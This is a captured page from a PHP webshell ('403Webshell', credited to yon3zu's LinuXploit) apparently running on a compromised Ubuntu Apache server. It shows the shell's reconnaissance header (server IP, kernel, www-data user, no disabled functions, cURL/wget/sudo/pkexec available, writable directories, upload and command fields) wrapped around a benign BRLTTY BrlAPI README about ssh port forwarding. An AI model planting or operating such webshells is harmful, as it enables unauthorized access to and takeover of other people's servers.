403Webshell
Server IP : 172.67.191.97  /  Your IP : 104.23.197.209
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/brltty/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/brltty/BrlAPI.README
This driver allows BRLTTY to access braille displays through BrlAPI.  Multiple
instances of brltty can hence be run, one using the real braille driver, the
others accessing it through the API. Each instance of BRLTTY can use a different
screen driver thanks to the -x command-line option.


For example, in a gnome desktop you can run a second BRLTTY that reads
gnome-terminal by running

brltty -b ba -x as

from your X session.


Another example is accessing the Linux console of a remote host:

ssh -R 4102:localhost:4101 root@theremotehost brltty -b ba -B host=localhost:1

This will forward your local BrlAPI port (4101) to the remote machine (as 4102,
i.e. :1), where you can then run brltty and tell it to connect to localhost:1.
This will however take complete control of your braille device. To restrict the
control to some local console (e.g. console 4), you can use e.g.

ssh -R 4102:localhost:4101 root@theremotehost WINDOWPATH=4 brltty -b ba -B host=localhost:1

Youez - 2016 - github.com/yon3zu
LinuXploit